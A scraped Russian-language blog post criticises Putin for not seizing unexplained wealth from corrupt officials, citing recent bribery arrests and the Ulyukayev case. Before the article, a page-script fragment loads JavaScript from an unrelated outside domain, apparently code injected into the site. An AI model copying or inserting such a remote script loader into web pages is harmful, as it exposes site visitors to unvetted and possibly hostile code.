, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Что ещё должно произойти, чтобы Путин начал борьбу с имуществом «сомнительного происхождения» своих назначенцев?

22 Ноя

В чём причины усиления социальной несправедливости?

Мне представляется, что в нежелании понять причины, её, эту несправедливость, порождающие.

Данные опроса https://www.interfax.ru/russia/639100?utm_source=yxnews&utm_medium=desktop  ВЦИОМ, показывают, что  только 14% опрошенных считают, что для обеспечения социальной справедливости в обществе необходимо принятие мер на государственном уровне по борьбе с коррупцией. И это несмотря на то, что СМИ постоянно сообщают https://lenta.ru/news/2018/11/22/vadik/?utm_referrer=https%3A%2F%2Fzen.yandex.com    о новых лицах, замеченных в коррупционном обогащении.

Так, например,  о новом  полковнике, хранившем миллиард уже не в квартире, как это делал полковник Захарченко,  а на счетах.

Арестованный по обвинению в получении взятки в особо крупном размере глава Управления экономической безопасности и противодействия коррупции ГУ МВД по Алтайскому краю Вадим Надвоцкий был известен в определенных кругах под кличкой Вадик Всемогущий, на его счетах нашли миллиард рублей.

В загородном доме Вадика Всемогущего, а это 35 соток земли с лесом, прошли обыски.

Вот так, главный борец с коррупцией Алтая оказался миллиардером Вадиком Всемогущим, а в контролирующих его работу ведомствах, и ведать не ведали об этом.

Не потому ли в одном и том же ведомстве задерживают уже четвёртого генерала https://dailystorm.ru/news/pri-poluchenii-vzyatki-v-moskve-zaderzhan-general-skr?utm_referrer=https%3A%2F%2Fzen.yandex.com  при получении взятки?

Предыдущий арест и осуждение генералов Дмитрия Довгия, Дениса Никандрова и Александра Дрыманова, никак не повлияли на  Сергея Дубинского. Он решил, что его криминальное обогащение пройдёт незаметно.

Как видим, применяемые меры по противодействию коррупции не эффективны, затратные  для государства и для налогоплательщиков. Их привлечение к уголовной ответственности,  не останавливают тех, кто назначен на их должности, верно служить Закону.

В каждом регионе россияне знают о каждом чиновнике, что живёт явно не нате средства, что официально получает, а ответственные за достоверность деклараций чиновников, полагают, что они «чище слезы Папы Римского» https://www.mk.ru/politics/2015/11/02/sergey-ivanov-deklaracii-khoroshavina-i-gayzera-chishhe-slezy-papy-rimskogo.html

Поэтому и мог глава Управления экономической безопасности и противодействия коррупции ГУ МВД по Алтайскому краю Вадим Надвоцкий, стать обладателем  загородного дома, что стоит  на 35 сотках земли с лесом,  а также безнаказанно размещать и хранить на счетах миллиард рублей. Происхождением таких денег никто не интересовался из обязанных это делать надзорных структур.

Поэтому и генералов СКР ничто не удерживало от злоупотреблений служебным положением и взяточничества.

Никто же не интересуется их имуществом  «сомнительного происхождения».

Более того, как показали события, связанные с осуждением бывшего члена правительства, Улюкаева, суды не наказывают взяточников материально, даже в тех случаях, когда были все основания  сомневаться в том, что ни дня не работавший в бизнесе министр, имел собственность более миллиарда рублей.

На Улюкаева наложили штраф в размере однократной суммы взятки, а могли в размере двадцатикратной.

Но Администрация Президента Путина могла бы собрать и материалы, доказывающие, что на свои зарплаты Улюкаев, заработать миллиард рублей не мог. Это позволило бы  обратить  в доход Российской Федерации имущество Улюкаева, в отношении которого им не представлены доказательства его приобретения на законные доходы (п.п. 8 п. 2 ст. 235 ГК РФ).

Однако, подписав этот закон шесть лет тому назад, Путин не даёт ему широкого применения даже к тем его назначенцам, которые осуждены за коррупционные деяния.

Разве это не создаёт условия для новых коррупционных деяний?

Разве такое бездействие главы государства не является причиной, порождающей ощущение социальной несправедливости  у тех, кто является законопослушным?

Если так безнаказанно живут и действуют члены правительства, министры, генерала, главы Управления экономической безопасности и противодействия коррупции, то, что остаётся делать их подчинённым?

Правильно. Вот и они вершат своё самовластие на своём уровне, что не может не усиливать несправедливость в обществе.

Скоро Путину вновь предстоит давать ответы на вопросы, волнующие россиян.

Я постоянно спрашиваю Путина: «Почему он не исполняет  обязанности гаранта Конституции России и, формируя состав исполнителей судебной власти, не устанавливает правосудие?»

Сейчас на этот вопрос не получаю даже отписок.

Новый бюджет одобрен и принят Госдумой, но мер противодействующий нецелевому использованию и разворовыванию народного достояния, не названо.

Поэтому спрошу об ином: «Уважаемый Владимир Владимирович! Когда Вы начнёте изымать у Ваших назначенцев имущество  «сомнительного происхождения»?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.